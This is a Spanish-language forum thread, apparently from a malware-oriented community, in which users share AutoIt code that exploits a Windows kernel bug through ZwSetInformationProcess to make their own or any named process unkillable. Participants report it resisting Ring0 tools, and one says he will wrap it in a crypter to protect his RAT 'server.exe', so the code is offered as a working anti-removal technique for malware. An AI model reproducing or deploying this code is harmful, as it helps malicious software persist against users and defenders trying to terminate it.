Mostrar mensajes previos
Ordenar por
por M3 Usa camisa de fuerza
Buenas , buenas

como andam compadres ? espero bien ....

Ya Hace tiempo no aporto algo por questiones familiares de salud , pero ya estoy volviendo

Los dejo este code de Pink que lo pase a AutoIt para que disfrutem ,

Saludos


Código: Seleccionar todo

; ========================================================================================
; Non-Killable Process
; Author AutoIt : M3
; Author VB6 : Pink
; Author Delphi : Metal_Kingdom
; Credits : waleedassar
; Reference : http://waleedassar.blogspot.com/2013/02/kernel-bug-1-processiopriority.html
; Usage : sNonKillableProcess()
; Enjoy
; ========================================================================================


Func sNonKillableProcess()

Local $sProcessHandle , $sSignedvalue , $ProcessIoPriority , $sProcessInformationLength , $sStruct

If Not @Compiled Then Exit

$sProcessHandle = DllCall("kernel32.dll", "handle", "GetCurrentProcess")

$sSignedvalue = 0x8000F129 ;0xFFFFFFFF (BSOD not work on Win7 x86 )

$ProcessIoPriority = 0x21

$sProcessInformationLength = 0x4

$sStruct = DLLStructCreate("Byte[4]")

DllStructSetData($sStruct, 1, $sSignedvalue)

$sRet = DllCall ("ntdll.dll" , "none" , "ZwSetInformationProcess" , "int" , $sProcessHandle[0] , "int" , _
$ProcessIoPriority , "int" , DllStructGetPtr($sStruct) , "int" , $sProcessInformationLength)

EndFunc

Indetectables RAT v.0.9.5

@Indetectables Team
por M3 Usa camisa de fuerza
Buenas , ay los dejo por se quierem utilizar para otros procesos


Código: Seleccionar todo

Func sNonKillableProcess($sProcess)

Local $sProcessHandle , $sPid , $sAccess , $sSignedvalue , $ProcessIoPriority , $sProcessInformationLength , $sStruct

If Not @Compiled Then Exit

$sPid = ProcessExists($sProcess)

if Not $sPid Then Exit

$sAccess = 0x001F0FFF

$sProcessHandle  =  DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $sAccess, "bool", True, "dword", $sPid)

$sSignedvalue = 0x8000F129 ;0xFFFFFFFF (BSOD not work on Win7 x86 )

$ProcessIoPriority = 0x21

$sProcessInformationLength = 0x4

$sStruct = DLLStructCreate("Byte[4]")

DllStructSetData($sStruct, 1, $sSignedvalue)

$sRet = DllCall ("ntdll.dll" , "none" , "ZwSetInformationProcess" , "int" , $sProcessHandle[0]  , "int" , _
$ProcessIoPriority , "int" , DllStructGetPtr($sStruct) , "int" , $sProcessInformationLength)

EndFunc
El correcto seria cerar el handle , pero de nadie sirviria jaja


Saludos
Indetectables RAT v.0.9.5

@Indetectables Team
por M3 Usa camisa de fuerza
Gracias bros , saludos

Tomjose , se acaso te refiere a lo segundo ejemplo , sirve para utiizar para otros procesos existentes

ejemplo :

Código: Seleccionar todo

sNonKillableProcess('notepad.exe')
Indetectables RAT v.0.9.5

@Indetectables Team
por Pink Usa camisa de fuerza
ZeRiito escribió:permite no cerrar procesos en Ring0 ?
Yo probe con una Herramienta a Ring0 y no lo pude cerrar.


Imagen
por ZeRiito Sin sí­ntomas
es excelente este codigo me ha gustado muchisimo en verdad no sale el aviso como otros codigos que protegen los procesos simplemente no permite cerrarlo sin que salga nada de aviso

ahora intentare hacerlo como si fuece un crypter una Gui para pasar mi server.exe ya con el protector buenisimo en verdad se agradece

Código: Seleccionar todo

NoExistente
[/color]
por x4r0r Delirios esporádicos
recien veo este codigo y la verdad que es algo raro porque permite cerrarlo con el process hacker ...si es un bug -.---

windows 8 32 / 64 bits no funcaaa esta mela porque sera help me
Ida pro 5.0
ollydbg
Windbg
Inmunytydebugger
Hexing
y un cerebro

Mostrar/Ocultar

por Scorpio Moderador
x4r0r escribió:recien veo este codigo y la verdad que es algo raro porque permite cerrarlo con el process hacker ...si es un bug -.---

windows 8 32 / 64 bits no funcaaa esta mela porque sera help me
¿Por que la gente suele corregir los Bug's?

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Temas similares
PEx64-Injector (Process Migrator) por xrahitel en Manuales y Tutoriales
Process Simulator v0.1 por 4n0nym0us en Troyanos y Herramientas
process hollowing por holdtheline en Dudas y Preguntas
Variantes de tema
Responder

Volver a “Fuentes”